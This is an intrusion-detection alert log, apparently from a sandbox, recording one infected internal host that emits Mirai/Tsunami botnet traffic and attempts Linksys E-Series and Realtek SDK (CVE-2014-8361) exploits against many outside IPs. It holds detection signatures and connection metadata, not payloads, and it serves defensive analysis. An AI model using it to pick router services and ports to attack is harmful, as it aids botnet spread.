ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.65.169.109

Timestamp:	192.168.2.23172.65.169.10939674555552027153 05/14/22-02:12:39.774899
SID:	2027153
Source Port:	39674
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.65.231.2

Timestamp:	192.168.2.23172.65.231.233364555552027153 05/14/22-02:13:09.597097
SID:	2027153
Source Port:	33364
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.57.97.68

Timestamp:	192.168.2.2395.57.97.6840424802027121 05/14/22-02:13:39.679280
SID:	2027121
Source Port:	40424
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.140.152.231

Timestamp:	192.168.2.2395.140.152.23150056802027121 05/14/22-02:12:01.355884
SID:	2027121
Source Port:	50056
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound - Source IP: 192.168.2.23 - Destination IP: 156.245.58.191

Timestamp:	192.168.2.23156.245.58.19151136528692027339 05/14/22-02:13:43.469946
SID:	2027339
Source Port:	51136
Destination Port:	52869
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.101.97.17

Timestamp:	192.168.2.2395.101.97.1744422802027121 05/14/22-02:12:41.078436
SID:	2027121
Source Port:	44422
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.245.60.199

Timestamp:	192.168.2.23172.245.60.19934734555552027153 05/14/22-02:12:33.796503
SID:	2027153
Source Port:	34734
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.217.167.134

Timestamp:	192.168.2.2395.217.167.13447040802027121 05/14/22-02:11:46.033771
SID:	2027121
Source Port:	47040
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.215.156.67

Timestamp:	192.168.2.2395.215.156.6752884802027121 05/14/22-02:12:16.318734
SID:	2027121
Source Port:	52884
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.101.46.190

Timestamp:	192.168.2.2395.101.46.19048630802027121 05/14/22-02:12:21.650694
SID:	2027121
Source Port:	48630
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.217.235.136

Timestamp:	192.168.2.2395.217.235.13641662802027121 05/14/22-02:12:33.688261
SID:	2027121
Source Port:	41662
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.233.89.221

Timestamp:	192.168.2.2395.233.89.22138802802027121 05/14/22-02:12:23.904902
SID:	2027121
Source Port:	38802
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.65.62.179

Timestamp:	192.168.2.23172.65.62.17956852555552027153 05/14/22-02:13:43.822168
SID:	2027153
Source Port:	56852
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.232.143.204

Timestamp:	192.168.2.2395.232.143.20460296802027121 05/14/22-02:12:18.496747
SID:	2027121
Source Port:	60296
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound - Source IP: 192.168.2.23 - Destination IP: 156.230.26.191

Timestamp:	192.168.2.23156.230.26.19155878528692027339 05/14/22-02:11:53.192069
SID:	2027339
Source Port:	55878
Destination Port:	52869
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.65.94.187

Timestamp:	192.168.2.23172.65.94.18738124555552027153 05/14/22-02:12:18.507683
SID:	2027153
Source Port:	38124
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.65.128.1

Timestamp:	192.168.2.23172.65.128.154408555552027153 05/14/22-02:12:33.812550
SID:	2027153
Source Port:	54408
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 98.156.215.149

Timestamp:	192.168.2.2398.156.215.14960094555552027153 05/14/22-02:12:39.490306
SID:	2027153
Source Port:	60094
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.65.185.133

Timestamp:	192.168.2.23172.65.185.13355574555552027153 05/14/22-02:12:13.767472
SID:	2027153
Source Port:	55574
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.65.84.37

Timestamp:	192.168.2.23172.65.84.3757214555552027153 05/14/22-02:13:39.278830
SID:	2027153
Source Port:	57214
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.65.96.152

Timestamp:	192.168.2.23172.65.96.15238076555552027153 05/14/22-02:12:00.125302
SID:	2027153
Source Port:	38076
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.140.158.56

Timestamp:	192.168.2.2395.140.158.5644624802027121 05/14/22-02:12:04.825916
SID:	2027121
Source Port:	44624
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.213.221.72

Timestamp:	192.168.2.2395.213.221.7259042802027121 05/14/22-02:12:07.007532
SID:	2027121
Source Port:	59042
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.65.3.88

Timestamp:	192.168.2.23172.65.3.8833946555552027153 05/14/22-02:12:09.369030
SID:	2027153
Source Port:	33946
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.65.122.63

Timestamp:	192.168.2.23172.65.122.6336554555552027153 05/14/22-02:12:36.880562
SID:	2027153
Source Port:	36554
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.137.248.145

Timestamp:	192.168.2.2395.137.248.14536432802027121 05/14/22-02:12:08.453059
SID:	2027121
Source Port:	36432
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.245.90.172

Timestamp:	192.168.2.23172.245.90.17253412555552027153 05/14/22-02:12:57.186108
SID:	2027153
Source Port:	53412
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.65.214.130

Timestamp:	192.168.2.23172.65.214.13053118555552027153 05/14/22-02:11:51.219527
SID:	2027153
Source Port:	53118
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.241.12.221

Timestamp:	192.168.2.2395.241.12.22138544802027121 05/14/22-02:11:55.060172
SID:	2027121
Source Port:	38544
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.65.182.182

Timestamp:	192.168.2.23172.65.182.18248080555552027153 05/14/22-02:13:35.706960
SID:	2027153
Source Port:	48080
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.65.121.92

Timestamp:	192.168.2.23172.65.121.9241308555552027153 05/14/22-02:12:09.369123
SID:	2027153
Source Port:	41308
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.101.184.232

Timestamp:	192.168.2.2395.101.184.23233834802027121 05/14/22-02:12:21.652251
SID:	2027121
Source Port:	33834
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound - Source IP: 192.168.2.23 - Destination IP: 156.232.88.71

Timestamp:	192.168.2.23156.232.88.7134042528692027339 05/14/22-02:13:40.087312
SID:	2027339
Source Port:	34042
Destination Port:	52869
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.65.178.41

Timestamp:	192.168.2.23172.65.178.4134822555552027153 05/14/22-02:12:03.763652
SID:	2027153
Source Port:	34822
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 88.247.218.183

Timestamp:	192.168.2.2388.247.218.18357044802027121 05/14/22-02:12:45.593968
SID:	2027121
Source Port:	57044
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.65.69.96

Timestamp:	192.168.2.23172.65.69.9639336555552027153 05/14/22-02:12:07.296304
SID:	2027153
Source Port:	39336
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.101.179.121

Timestamp:	192.168.2.2395.101.179.12147784802027121 05/14/22-02:12:31.371567
SID:	2027121
Source Port:	47784
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound - Source IP: 192.168.2.23 - Destination IP: 156.224.24.201

Timestamp:	192.168.2.23156.224.24.20137358528692027339 05/14/22-02:12:48.476728
SID:	2027339
Source Port:	37358
Destination Port:	52869
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.6.51.108

Timestamp:	192.168.2.2395.6.51.10858676802027121 05/14/22-02:12:23.988881
SID:	2027121
Source Port:	58676
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.65.85.107

Timestamp:	192.168.2.23172.65.85.10737946555552027153 05/14/22-02:13:35.724142
SID:	2027153
Source Port:	37946
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.65.254.10

Timestamp:	192.168.2.23172.65.254.1054364555552027153 05/14/22-02:11:51.219793
SID:	2027153
Source Port:	54364
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.216.233.126

Timestamp:	192.168.2.2395.216.233.12645134802027121 05/14/22-02:12:12.375722
SID:	2027121
Source Port:	45134
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.65.161.125

Timestamp:	192.168.2.23172.65.161.12547106555552027153 05/14/22-02:11:53.487798
SID:	2027153
Source Port:	47106
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.153.16.93

Timestamp:	192.168.2.2395.153.16.9334294802027121 05/14/22-02:11:52.636220
SID:	2027121
Source Port:	34294
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.216.46.163

Timestamp:	192.168.2.2395.216.46.16342972802027121 05/14/22-02:11:46.033701
SID:	2027121
Source Port:	42972
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.38.149.76

Timestamp:	192.168.2.2395.38.149.7653014802027121 05/14/22-02:12:31.524055
SID:	2027121
Source Port:	53014
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.79.118.178

Timestamp:	192.168.2.2395.79.118.17840476802027121 05/14/22-02:11:57.971047
SID:	2027121
Source Port:	40476
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 88.249.29.119

Timestamp:	192.168.2.2388.249.29.11953336802027121 05/14/22-02:13:46.157357
SID:	2027121
Source Port:	53336
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.65.68.140

Timestamp:	192.168.2.23172.65.68.14050106555552027153 05/14/22-02:12:34.813598
SID:	2027153
Source Port:	50106
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 88.221.77.45

Timestamp:	192.168.2.2388.221.77.4548254802027121 05/14/22-02:13:08.856075
SID:	2027121
Source Port:	48254
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.15.240.180

Timestamp:	192.168.2.2395.15.240.18036256802027121 05/14/22-02:12:57.841983
SID:	2027121
Source Port:	36256
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 88.145.17.118

Timestamp:	192.168.2.2388.145.17.11850038802027121 05/14/22-02:12:39.860168
SID:	2027121
Source Port:	50038
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.137.248.65

Timestamp:	192.168.2.2395.137.248.6544254802027121 05/14/22-02:11:52.623905
SID:	2027121
Source Port:	44254
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.140.37.166

Timestamp:	192.168.2.2395.140.37.16651080802027121 05/14/22-02:12:12.365029
SID:	2027121
Source Port:	51080
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.65.9.9

Timestamp:	192.168.2.23172.65.9.938206555552027153 05/14/22-02:13:05.459841
SID:	2027153
Source Port:	38206
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.217.81.204

Timestamp:	192.168.2.2395.217.81.20448500802027121 05/14/22-02:12:06.989141
SID:	2027121
Source Port:	48500
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.112.170.49

Timestamp:	192.168.2.2395.112.170.4958398802027121 05/14/22-02:12:53.415920
SID:	2027121
Source Port:	58398
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.255.80.235

Timestamp:	192.168.2.23172.255.80.23550844555552027153 05/14/22-02:12:37.003666
SID:	2027153
Source Port:	50844
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.58.115.234

Timestamp:	192.168.2.2395.58.115.23438118802027121 05/14/22-02:13:01.036403
SID:	2027121
Source Port:	38118
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.57.36.245

Timestamp:	192.168.2.2395.57.36.24550622802027121 05/14/22-02:12:41.043513
SID:	2027121
Source Port:	50622
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.217.183.131

Timestamp:	192.168.2.2395.217.183.13159274802027121 05/14/22-02:11:50.400173
SID:	2027121
Source Port:	59274
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.42.196.180

Timestamp:	192.168.2.2395.42.196.18045740802027121 05/14/22-02:12:31.450640
SID:	2027121
Source Port:	45740
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.65.10.51

Timestamp:	192.168.2.23172.65.10.5133430555552027153 05/14/22-02:12:33.795333
SID:	2027153
Source Port:	33430
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 88.250.111.144

Timestamp:	192.168.2.2388.250.111.14434764802027121 05/14/22-02:13:06.536692
SID:	2027121
Source Port:	34764
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.65.79.231

Timestamp:	192.168.2.23172.65.79.23133478555552027153 05/14/22-02:12:16.062298
SID:	2027153
Source Port:	33478
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.155.16.121

Timestamp:	192.168.2.2395.155.16.12139454802027121 05/14/22-02:12:31.388864
SID:	2027121
Source Port:	39454
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.179.219.137

Timestamp:	192.168.2.2395.179.219.13753258802027121 05/14/22-02:12:25.915169
SID:	2027121
Source Port:	53258
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.234.230.94

Timestamp:	192.168.2.2395.234.230.9448464802027121 05/14/22-02:12:07.069322
SID:	2027121
Source Port:	48464
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.216.174.179

Timestamp:	192.168.2.2395.216.174.17949448802027121 05/14/22-02:12:38.394262
SID:	2027121
Source Port:	49448
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.65.7.172

Timestamp:	192.168.2.2395.65.7.17256166802027121 05/14/22-02:12:41.092384
SID:	2027121
Source Port:	56166
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound - Source IP: 192.168.2.23 - Destination IP: 156.225.158.4

Timestamp:	192.168.2.23156.225.158.444432528692027339 05/14/22-02:13:11.398903
SID:	2027339
Source Port:	44432
Destination Port:	52869
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.128.47.63

Timestamp:	192.168.2.2395.128.47.6334392802027121 05/14/22-02:11:57.648436
SID:	2027121
Source Port:	34392
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 88.250.14.127

Timestamp:	192.168.2.2388.250.14.12748664802027121 05/14/22-02:12:43.303856
SID:	2027121
Source Port:	48664
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.82.129.197

Timestamp:	192.168.2.2395.82.129.19756414802027121 05/14/22-02:12:48.726937
SID:	2027121
Source Port:	56414
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.100.32.178

Timestamp:	192.168.2.2395.100.32.17844040802027121 05/14/22-02:12:38.583388
SID:	2027121
Source Port:	44040
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound - Source IP: 192.168.2.23 - Destination IP: 41.182.106.161

Timestamp:	192.168.2.2341.182.106.16151982528692027339 05/14/22-02:12:34.004298
SID:	2027339
Source Port:	51982
Destination Port:	52869
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound - Source IP: 192.168.2.23 - Destination IP: 156.226.87.240

Timestamp:	192.168.2.23156.226.87.24057702528692027339 05/14/22-02:12:14.078724
SID:	2027339
Source Port:	57702
Destination Port:	52869
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound - Source IP: 192.168.2.23 - Destination IP: 156.250.28.84

Timestamp:	192.168.2.23156.250.28.8451218528692027339 05/14/22-02:12:30.163455
SID:	2027339
Source Port:	51218
Destination Port:	52869
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 88.221.178.118

Timestamp:	192.168.2.2388.221.178.11839856802027121 05/14/22-02:13:20.399630
SID:	2027121
Source Port:	39856
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.219.228.159

Timestamp:	192.168.2.2395.219.228.15941954802027121 05/14/22-02:13:26.255296
SID:	2027121
Source Port:	41954
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.65.103.53

Timestamp:	192.168.2.23172.65.103.5337110555552027153 05/14/22-02:13:39.278904
SID:	2027153
Source Port:	37110
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.179.136.29

Timestamp:	192.168.2.2395.179.136.2934744802027121 05/14/22-02:12:36.319934
SID:	2027121
Source Port:	34744
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.35.24.89

Timestamp:	192.168.2.2395.35.24.8941260802027121 05/14/22-02:12:33.761799
SID:	2027121
Source Port:	41260
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.130.28.148

Timestamp:	192.168.2.2395.130.28.14846038802027121 05/14/22-02:12:25.946869
SID:	2027121
Source Port:	46038
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.65.247.108

Timestamp:	192.168.2.23172.65.247.10835834555552027153 05/14/22-02:11:56.029720
SID:	2027153
Source Port:	35834
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.100.78.17

Timestamp:	192.168.2.2395.100.78.1757512802027121 05/14/22-02:12:36.286426
SID:	2027121
Source Port:	57512
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound - Source IP: 192.168.2.23 - Destination IP: 156.226.101.148

Timestamp:	192.168.2.23156.226.101.14858192528692027339 05/14/22-02:13:26.890663
SID:	2027339
Source Port:	58192
Destination Port:	52869
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.214.217.51

Timestamp:	192.168.2.2395.214.217.5141366802027121 05/14/22-02:11:58.000914
SID:	2027121
Source Port:	41366
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.223.112.70

Timestamp:	192.168.2.2395.223.112.7048866802027121 05/14/22-02:12:12.320419
SID:	2027121
Source Port:	48866
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.142.206.192

Timestamp:	192.168.2.2395.142.206.19256690802027121 05/14/22-02:13:14.627398
SID:	2027121
Source Port:	56690
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.110.252.17

Timestamp:	192.168.2.2395.110.252.1742942802027121 05/14/22-02:11:57.661872
SID:	2027121
Source Port:	42942
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.65.66.172

Timestamp:	192.168.2.23172.65.66.17232904555552027153 05/14/22-02:13:28.458438
SID:	2027153
Source Port:	32904
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.101.105.37

Timestamp:	192.168.2.2395.101.105.3756486802027121 05/14/22-02:12:16.042664
SID:	2027121
Source Port:	56486
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

